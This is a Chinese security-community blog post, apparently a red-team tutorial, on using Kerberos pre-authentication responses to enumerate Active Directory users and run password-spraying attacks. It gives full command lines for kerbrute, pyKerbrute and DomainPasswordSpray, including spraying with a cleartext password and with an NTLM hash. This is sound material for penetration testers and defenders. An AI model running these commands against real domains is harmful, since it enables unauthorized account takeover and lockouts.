原创 zksmile SecHub网络安全社区
SecHub网络安全社区
微信号 secevery0x01
功能介绍 隶属于SecHub网络安全社区,致力于研究渗透测试、红蓝对抗、应急响应、实战案例、钓鱼社工、和漏洞分析,定期分享实战案例、技术教程、安全工具等前沿网络安全资源。
__发表于
收录于合集 #内网渗透 12个
点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
**添加星标不迷路
**
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦
在 Kerberos 协议认证的 AS-REQ 阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS- REP的返回包不一样。所以可以利用这点,对域内进行域用户枚举和密码喷洒攻击
https://github.com/ropnop/kerbrute/releases #下载地址
需要获取dc的ip,域名,如这里将想要爆破的用户放入user.txt中。
.\kerbrute_windows_amd64.exe userenum --dc 192.168.30.12 -d test.com .\user.txt
https://github.com/3gstudent/pyKerbrute #下载地址
用Python写的版本,使用同样需要DC的IP、域名,如这里将想要爆破的用户放入user.txt
python2 EnumADUser.py 192.168.30.12 test.com user.txt udp
或
python2 EnumADUser.py 192.168.30.12 test.com user.txt tcp
密码喷洒,是用固定的密码去跑用户名。
.\kerbrute_windows_amd64.exe passwordspray --dc 192.168.30.12 -d test.com .\user.txt passw12#
针对明文进行喷洒
python2 ADPwdSpray.py 192.168.30.12 test.com user.txt clearpassword passw12# tcp
针对哈希进行喷洒
python2 ADPwdSpray.py 192.168.30.12 test.com user.txt ntlmhash F6502CBE4802F94AB472288970C124CD udp
默认情况下它将利用LDAP从域中导出用户列表,然后扣掉被锁定的用户,再用固定密码进行密码喷洒。需要使用域权限账户
https://github.com/dafthack/DomainPasswordSpray #下载地址
使用如下
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password 密码
欢迎关注SecHub网络安全社区,SecHub网络安全社区目前邀请式注册,邀请码获取见公众号菜单【邀请码】
#
**企业简介 **
赛克艾威 - 专注政企安全服务
**
**
北京赛克艾威科技有限公司(简称:赛克艾威),成立于2016年9月,具有中国网络安全审查技术与认证中心安全风险评估服务三级资质CCRC,信息安全保障人员资质CISAW(安全评估专家级)。
安全评估|渗透测试|漏洞扫描|安全巡检
代码审计|钓鱼演练|应急响应|安全运维
重大时刻安保|企业安全培训
联系方式
电话|010-86460828
关注我们
公众号: SecHub网络安全社区
哔哩号: SecHub官方账号
预览时标签不可点
微信扫一扫
关注该公众号
知道了
微信扫一扫
使用小程序
取消 允许
取消 允许
: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看